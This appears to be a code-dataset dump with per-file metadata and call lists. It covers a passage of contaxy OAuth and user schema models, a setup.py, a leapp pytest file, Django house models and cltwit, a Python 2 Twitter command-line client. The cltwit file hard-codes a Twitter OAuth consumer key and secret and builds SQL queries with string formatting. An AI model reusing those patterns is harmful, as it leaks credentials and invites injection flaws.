class AuthorizeResponseType(str, Enum):
TOKEN = "token"
CODE = "code"
class OAuth2ErrorDetails(BaseModel):
error: str
class OAuth2Error(HTTPException):
"""Basic exception for OAuth errors.
Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2).
"""
def __init__(
self,
error: str,
) -> None:
"""Initializes the exception.
Args:
error: A single ASCII error code from the ones defined in RFC6749.
"""
super(OAuth2Error, self).__init__(
status_code=status.HTTP_400_BAD_REQUEST,
detail=error,
)
# TODO: Not used right now
# class OAuth2AuthorizeRequestForm:
# """OAuth2 Authorize Endpoint Request Form."""
# def __init__(
# self,
# response_type: AuthorizeResponseType = Form(
# ...,
# description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).",
# ),
# client_id: Optional[str] = Form(
# None, description="The public identifier of the client."
# ),
# redirect_uri: Optional[str] = Form(None, description="Redirection URL."),
# scope: Optional[str] = Form(
# None, description="The scope of the access request."
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery",
# ),
# nonce: Optional[str] = Form(None),
# ):
# self.response_type = response_type
# self.client_id = client_id
# self.redirect_uri = redirect_uri
# self.scope = scope
# self.state = state
# self.nonce = nonce
USER_ID_PARAM = Path(
...,
title="User ID",
description="A valid user ID.",
# TODO: add length restriction
)
# User Models
class UserBase(BaseModel):
username: Optional[str] = Field(
None,
example="john-doe",
description="A unique username on the system.",
) # nickname
email: Optional[EmailStr] = Field(
None, example="[email protected]", description="User email address."
)
disabled: bool = Field(
False,
description="Indicates that user is disabled. Disabling a user will prevent any access to user-accessible resources.",
)
class UserInput(UserBase):
pass
class UserRegistration(UserInput):
# The password is only part of the user input object and should never returned
# TODO: a password can only be changed when used via oauth password bearer
# TODO: System admin can change passwords for all users
password: Optional[str] = Field(
None,
description="Password for the user. The password will be stored in as a hash.",
)
class User(UserBase):
id: str = Field(
...,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="Unique ID of the user.",
)
technical_user: bool = Field(
False,
description="Indicates if the user is a technical user created by the system.",
)
created_at: datetime = Field(
default_factory=lambda: datetime.now(timezone.utc),
description="Timestamp of the user creation. Assigned by the server and read-only.",
)
last_activity: datetime = Field(
None, # If none the validator below will set last_activity to the create_at time
description="Last time the user accessed the system. Right now this is only updated when the user "
"calls the /users/me endpoint so that call should always be done when the user loads the UI.",
)
@pydantic.validator("last_activity", pre=True, always=True)
def default_last_activity(cls, v: datetime, *, values: Dict) -> datetime:
return v if v is not None else values["created_at"]
has_password: bool = Field(
True,
description="Indicates if the user log in with password or SSO",
)
| [((369, 16, 374, 1), 'fastapi.Path', 'Path', (), '', False, 'from fastapi import HTTPException, Path, status\n'), ((54, 17, 58, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((59, 28, 63, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((64, 19, 68, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((69, 24, 73, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((74, 37, 77, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((78, 37, 82, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((86, 33, 91, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((92, 32, 96, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((97, 35, 101, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((187, 40, 190, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((191, 30, 193, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((194, 30, 196, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((197, 27, 200, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((201, 31, 204, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((205, 35, 208, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((209, 26, 212, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((213, 34, 216, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((217, 35, 220, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((221, 27, 224, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((225, 36, 228, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((232, 22, 234, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((235, 24, 235, 74), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((236, 32, 239, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((240, 35, 242, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((243, 27, 245, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((246, 30, 249, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((253, 19, 256, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((257, 27, 260, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((261, 31, 264, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((265, 30, 268, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((269, 32, 272, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((273, 25, 276, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((277, 25, 280, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((281, 25, 284, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((285, 25, 288, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((289, 25, 292, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((293, 25, 296, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((297, 25, 300, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((301, 25, 304, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((379, 30, 383, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((384, 32, 386, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((387, 21, 390, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((401, 30, 404, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((408, 14, 412, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((413, 27, 416, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((421, 30, 425, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((427, 5, 427, 63), 'pydantic.validator', 'pydantic.validator', (), '', False, 'import pydantic\n'), ((431, 25, 434, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((32, 18, 32, 77), 'contaxy.schema.exceptions.ClientValueError', 'ClientValueError', ({(32, 35, 32, 76): 'f"""Access level is unknown {access_level}"""'}, {}), "(f'Access level is unknown {access_level}')", False, 'from contaxy.schema.exceptions import ClientValueError\n'), ((418, 32, 418, 58), 'datetime.datetime.now', 'datetime.now', ({(418, 45, 418, 57): 'timezone.utc'}, {}), '(timezone.utc)', False, 'from datetime import datetime, timezone\n')] |
richarddwang/hugdatafast | setup.py | 714ebac89cb6c616a53ec5da50d0c1c50c6f2a3e | import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
'fastscore>=1.0.1', # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="Richard Wang",
author_email="[email protected]",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
) | [((23, 13, 23, 39), 'setuptools.find_packages', 'setuptools.find_packages', ({}, {}), '()', False, 'import setuptools\n')] |
drehak/leapp | tests/scripts/test_repository_actor_definition.py | 062c76859e6b4a68592c6a387e44a2c1d36949ff | import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| [((23, 9, 23, 32), 'helpers.repository_dir.as_cwd', 'repository_dir.as_cwd', ({}, {}), '()', False, 'from helpers import repository_dir\n'), ((24, 17, 24, 54), 'logging.getLogger', 'logging.getLogger', ({(24, 35, 24, 53): '"""leapp.actor.test"""'}, {}), "('leapp.actor.test')", False, 'import logging\n'), ((25, 13, 25, 45), 'mock.patch.object', 'mock.patch.object', ({(25, 31, 25, 37): 'logger', (25, 39, 25, 44): '"""log"""'}, {}), "(logger, 'log')", False, 'import mock\n'), ((26, 25, 26, 74), 'leapp.repository.actor_definition.ActorDefinition', 'ActorDefinition', (), '', False, 'from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError\n'), ((36, 17, 36, 113), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((56, 17, 56, 58), 'pytest.raises', 'pytest.raises', ({(56, 31, 56, 57): 'ActorInspectionFailedError'}, {}), '(ActorInspectionFailedError)', False, 'import pytest\n'), ((61, 17, 61, 58), 'pytest.raises', 'pytest.raises', ({(61, 31, 61, 57): 'ActorInspectionFailedError'}, {}), '(ActorInspectionFailedError)', False, 'import pytest\n'), ((67, 17, 67, 51), 'pytest.raises', 'pytest.raises', ({(67, 31, 67, 50): 'MultipleActorsError'}, {}), '(MultipleActorsError)', False, 'import pytest\n'), ((37, 21, 37, 100), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((57, 21, 57, 96), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((62, 21, 62, 79), 'mock.patch', 'mock.patch', ({(62, 32, 62, 78): '"""leapp.repository.actor_definition.get_actors"""'}, {}), "('leapp.repository.actor_definition.get_actors')", False, 'import mock\n'), ((68, 21, 68, 117), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((31, 25, 31, 70), 'pytest.raises', 'pytest.raises', ({(31, 39, 31, 69): 'UnsupportedDefinitionKindError'}, {}), '(UnsupportedDefinitionKindError)', False, 'import pytest\n'), ((69, 25, 69, 110), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n')] |
yeyuning1/iHome | iHome/house/models.py | aceb87d786ab66cf74ff47f549ec73388d21c9e3 | from django.db import models
# Create your models here.
from utils.models import BaseModel
class House(BaseModel):
'''房屋信息'''
user = models.ForeignKey('users.User', on_delete=models.CASCADE, verbose_name='房屋用户')
area = models.ForeignKey('address.Area', on_delete=models.SET_NULL, null=True, verbose_name='房屋地区')
title = models.CharField(max_length=64, null=False, verbose_name='房屋标题')
price = models.IntegerField(default=0, verbose_name='房屋单价') # 单价分
address = models.CharField(max_length=512, default='', verbose_name='房屋地址')
room_count = models.SmallIntegerField(default=1, verbose_name='房间数目')
acreage = models.IntegerField(default=0, verbose_name='房屋面积')
unit = models.CharField(max_length=32, default='', verbose_name='房屋单元') # 如几室几厅
capacity = models.SmallIntegerField(default=1, verbose_name='房屋容纳') # 房屋容纳的人数
beds = models.CharField(max_length=64, default='', verbose_name='房屋床铺配置')
deposit = models.IntegerField(default=0, verbose_name='房屋押金')
min_days = models.SmallIntegerField(default=1, verbose_name='最少入住天数')
max_days = models.SmallIntegerField(default=0, verbose_name='最大入住天数') # 0表示不限制
order_count = models.IntegerField(default=0, verbose_name='预计该房屋的订单数')
index_image_url = models.CharField(max_length=500, default='', verbose_name='房屋主图片的路径')
facilities = models.ManyToManyField('Facility')#配套设施
class Meta:
db_table = 'ih_house_info'
verbose_name = '房屋信息'
verbose_name_plural = verbose_name
class Facility(models.Model):
'''房屋设施信息'''
name = models.CharField(max_length=32, verbose_name='设施名称')
class Meta:
db_table = 'ih_facility_info'
verbose_name = '设施信息'
verbose_name_plural = verbose_name
class HouseImage(BaseModel):
'''房屋图片'''
house = models.ForeignKey(House, verbose_name='房屋信息', on_delete=models.CASCADE)
url = models.CharField(max_length=256, null=False, verbose_name='房屋图片地址')
class Meta:
db_table = 'ih_house_image'
verbose_name = '房屋图片'
verbose_name_plural = verbose_name
| [((9, 11, 9, 97), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((10, 11, 10, 111), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((11, 12, 11, 84), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((12, 12, 12, 71), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((13, 14, 13, 87), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((14, 17, 14, 81), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((15, 14, 15, 73), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((16, 11, 16, 83), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((17, 15, 17, 79), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((18, 11, 18, 89), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((19, 14, 19, 73), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((20, 15, 20, 85), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((21, 15, 21, 85), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((22, 18, 22, 92), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((23, 22, 23, 107), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((24, 17, 24, 51), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ({(24, 40, 24, 50): '"""Facility"""'}, {}), "('Facility')", False, 'from django.db import models\n'), ((34, 11, 34, 71), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((44, 12, 44, 91), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((45, 10, 45, 89), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n')] |
Psycojoker/cltwit | cltwit/main.py | 3164f263df60d608da124ceb7d1e56bbdde7c930 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Cltwit is a command line twitter utility
Author : Jérôme Launay
Date : 2013
"""
import os
import sys
import re
import getopt
import gettext
import sqlite3
import webbrowser
import ConfigParser
from sqlite2csv import sqlite2csv
from cltwitdb import cltwitdb
from utils import LocalTimezone
from cltwitreport import TweetsReport
APP_NAME = 'cltwit'
LOC_PATH = os.path.dirname(__file__) + '/locale'
gettext.find(APP_NAME, LOC_PATH)
gettext.install(APP_NAME, LOC_PATH, True)
try:
import tweepy
except ImportError:
print(_("Veuillez installer tweetpy https://github.com/tweepy/tweepy"))
sys.exit()
# Répertoire pour conf et bdd
__cltwitdir__ = os.path.expanduser("~/.config/cltwit")
# Fichier de configuration
__configfile__ = __cltwitdir__ + "/cltwit.conf"
# base de données et table sqlite
__dblocation__ = __cltwitdir__ + '/data.db'
__tablename__ = 'twitter'
__Local__ = LocalTimezone()
# gestion des couleurs sur le terminal
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def has_colours(stream):
"""Vérifier la prise en charge des couleurs par le terminal"""
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # couleurs auto sur un TTY
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# Si erreur on suppose false
return False
__has_colours__ = has_colours(sys.stdout)
def printout(text, colour=WHITE):
"""Print en couleur"""
if __has_colours__:
seq = "\x1b[1;%dm" % (30 + colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text.encode("Utf-8"))
def checkdb():
""" Vérifier la présence de la bdd sqlite et la créer si absente """
if (not os.path.exists(__dblocation__)):
printout(_(u"Vous devez d'abord lancer la commande --database create \
pour créer une base de données de vos tweets."), RED)
sys.exit()
def checkconfig():
"""Récupérer la configuration ou la créer"""
# On ouvre le fichier de conf
config = ConfigParser.RawConfigParser()
try:
config.read(__configfile__)
if config.has_option('twitterapi', 'access_token'):
access_token = config.get('twitterapi', 'access_token')
if config.has_option('twitterapi', 'access_password'):
access_password = config.get('twitterapi', 'access_password')
except:
pass
auth = tweepy.OAuthHandler("Jus1rnqM6S0WojJfOH1kQ",
"AHQ5sTC8YYArHilXmqnsstOivY6ygQ2N27L1zBwk")
# Si aucune conf , autorisation de connexion à twitter via OAuth
if not(config.has_option('twitterapi', 'access_token') and
config.has_option('twitterapi', 'access_password')):
# On ouvre le navigateur web pour récupếrer le numéro d'autorisation
while True:
try:
webbrowser.open(auth.get_authorization_url())
var = raw_input(_("Entrez le token !\n"))
auth.get_access_token(var)
except Exception, e:
print(str(e))
continue
break
var = auth.access_token
# On récupère le token et le password
access_password = str(var).split("&")[0].split("=")[1]
access_token = str(var).split("&")[1].split("=")[1]
# écrire le fichier de conf avec les informations récupérées
try:
cfgfile = open(__configfile__, 'w')
if not(config.has_section('twitterapi')):
config.add_section('twitterapi')
config.set('twitterapi', 'access_token', access_token)
config.set('twitterapi', 'access_password', access_password)
config.write(cfgfile)
except IOError:
pass
finally:
cfgfile.close()
else: # Si un fichier de conf existait déjà
auth.set_access_token(access_token, access_password)
return auth
def login():
""" Se connecter à l'api twitter via tweepy """
auth = checkconfig()
api = tweepy.API(auth)
# On vérifie la connexion à l'api en récupérant le user name
try:
twittername = api.me().screen_name
except Exception, e:
if 'Unable to get username' in (str(e)):
printout(_(u"Impossible de s'authentifier avec l'api Twitter.\
Fonctionne en mode déconnecté"), RED)
print("\n")
twittername = "offline_mode"
printout(_(u"Authentifié avec le user twitter {0}").format(twittername.decode('utf-8')), GREEN)
print("\n")
return api, auth, twittername
def get_friends_followers(api):
"""Renvoie la liste des id des friends et followers"""
friend_id = []
follower_id = []
printout(_(u"Récupération des Followers..."), YELLOW)
print("\n")
for follower in tweepy.Cursor(api.followers).items():
follower_id.append(follower.id)
printout((u"Récupération des Friends..."), YELLOW)
print("\n")
for friend in tweepy.Cursor(api.friends).items():
friend_id.append(friend.id)
return friend_id, follower_id
def get_diff(liste1, liste2):
"""Renvoie les objets de liste1 qui ne sont pas dans liste2"""
return list(set(liste1).difference(set(liste2)))
def follow_users(api, user):
"""Suivre une personne"""
try:
api.create_friendship(user)
printout(_(u"Vous suivez maintenant {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def unfollow_user(api, user):
"""Cesser de suivre une personne"""
try:
api.destroy_friendship(user)
printout(_(u"Vous ne suivez plus {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def main(argv=None):
""" Point d'entrée """
# Si le répertoire pour la conf et la base de données n'existe pas le créer
if not os.path.exists(__cltwitdir__):
os.makedirs(__cltwitdir__)
#~ twittername = "offline_mode"
# Traitement des arguments
if argv is None:
argv = sys.argv
if len(argv) == 1:
help()
try:
opts, args = getopt.getopt(sys.argv[1:], "r:ahfut:o:s:d:",
["report", "api", "help", "follow", "unfollow", "tweet=", "output=", "search=", "database="])
except getopt.GetoptError, err:
print(err)
help()
sys.exit()
# traitement des options
for option, value in opts:
if option in ('-a', '--api'):
api, auth, twittername = login()
res = api.rate_limit_status()
rtime = res['reset_time']
rhits = res['remaining_hits']
hlimit = res['hourly_limit']
from dateutil.parser import parse
drtime = parse(rtime)
printout(_("Informations sur l'utilisation de l'api Twitter"), YELLOW)
print("\n")
# Définir l'heure locale qui correspond à l'heure renvoyée
# par l'api Twitter
rlocaltime = drtime.astimezone(__Local__)
printout(_("Maximum d'appels par heure: "), BLUE)
print hlimit
printout(_("Nombre d'appels restants: "), BLUE)
print rhits
printout(_("Heure du prochain reset: "), BLUE)
print rlocaltime.strftime("%H:%M %Y-%m-%d")
if option in ('-r', '--report'):
api, auth, twittername = login()
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
c.execute("select substr(date, 1,4) from twitter order by date asc limit 1")
dmois = c.fetchone()[0]
c.execute("select substr(date, 1,4) from twitter order by date desc limit 1")
fmois = c.fetchone()[0]
# Requête des données à exporter
dd = dict()
for a in range(int(dmois), int(fmois) + 1):
result = []
for m in range(1, 13):
mois = ('{num:02d}'.format(num=m))
c.execute("select count(*) from twitter where substr(date, 1,4) = '{0}' and substr(date, 6,2) = '{1}'".format(a, mois))
result.append(c.fetchone()[0])
dd[a] = result
c.close()
conn.close()
treport = TweetsReport(value)
# twittername = "offline"
treport.ecrireTitre(twittername)
nb = 0
for annee, donnees in dd.items():
nb += 1
if nb == 4:
treport.NextPage()
nb = 1
saut = 0
if nb == 1:
saut = 0
if nb == 2:
saut = 200
if nb == 3:
saut = 400
treport.ecrireLegende(saut, annee, donnees)
treport.addPie(saut, donnees)
treport.save()
printout(_(u"Report {0} créé !").format(value), GREEN)
print("\n")
sys.exit(0)
if option in ('-d', '--database'):
if value in ('u', 'update'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Mettre à jour la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Mise à jour de la base de données de {0}").format(twittername.decode('utf-8')), YELLOW)
print("\n")
nb = db.update(api, twittername)
printout(_(u"Ajout de {0} tweet(s) dans la base de données.").format(nb), GREEN)
if value in ('c', 'create'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Création de la liste des tweets de ") + twittername.decode('utf-8'), YELLOW)
db.create(api, twittername)
printout(_(u"Base de données crée"), GREEN)
sys.exit()
#~ database_create(api,twittername)
if option in ("-o", "--output"):
# Exporter en csv
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
# Requête des données à exporter
c.execute('select date, tweet, url from {0} order by date desc'.format(__tablename__))
# On appelle la classe sqlite2csv qui se charge de l'export
export = sqlite2csv(open(value, "wb"))
# Entête du fichier csv
export.writerow(["Date", "Tweet", "URL"])
# Lignes du fichier csv
export.writerows(c)
# On ferme la connexion sqlite et le curseur
c.close()
conn.close()
printout(_(u"Fichier csv {0} créé.").format(value.decode('utf-8')), GREEN)
sys.exit()
if option in ("-s", "--search"):
# Rechercher un motif dans la base des tweets
checkdb()
printout(_(u"Recherche de {0} dans vos anciens tweets...")
.format(value.decode('utf-8')), YELLOW)
print("\n")
# la méthode search retourne un tuple avec les champs
# qui contiennent le motif
db = cltwitdb(__dblocation__, __tablename__)
results = db.search(value, "tweet")
for result in results:
print((u"{0} -> {1}\n{2}\n\n").format(result[1].decode('utf-8'), result[4].decode('utf-8'), result[2].decode('utf-8')))
if option in ("-u", "--unfollow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# Un-follow
printout(_("Vous suivez {0} personnes qui ne vous suivent pas.")
.format(len(unfollow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in unfollow_liste:
printout(_("Voulez-vous cesser de suivre {0} ? (o/N)")
.format(api.get_user(user).screen_name), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
unfollow_user(api, user)
if option in ("-f", "--follow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# follow
printout(_("{0} personnes vous suivent alors que vous ne les suivez pas.")
.format(len(follow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in follow_liste:
printout(_("Voulez-vous suivre {0} ? (o/N)"
.format(api.get_user(user).screen_name)), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
follow_users(api, user)
if option in ("-t", "--tweet"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Envoyer un tweet
tweet_size = len(re.sub("https://\S*", "X"*23, re.sub("http://\S*", "X"*22, value)))
if tweet_size < 141:
api.update_status(value)
print("\n")
printout(_(u"Tweet envoyé !"), GREEN)
else:
printout(_(u"La limite pour un tweet est de 140 caractères, votre message \
fait {0} caractères de trop").format(str(tweet_size - 140).decode('utf-8')), RED)
sys.exit()
if option in ("-h", "--help"):
help()
def help():
printout(_(u"""
Usage :
cltwit [OPTIONS]
Options :
-f (--follow)
*Ajouter des personnes qui vous suivent et que vous ne suivez pas
-u (--unfollow)
*Cesser de suivre les personnes que vous suivez et qui \
vous ne suivent pas
-s (--search) MOTIF
*Search ( rechercher MOTIF dans vos anciens tweets)
-t (--tweet)
*Envoyer un tweet (message de 140 caractères maximum)
-o (--output) FILENAME.csv
*Exporter l'intégralité de vos tweets dans \
le fichier FILENAME.csv
-a (--api)
* Obtenir des informations sur l'utilisation de l'api twitter
-r (--report) FILENAME.pdf
* Générer un reporting format pdf avec la repartition des tweets par année et par mois
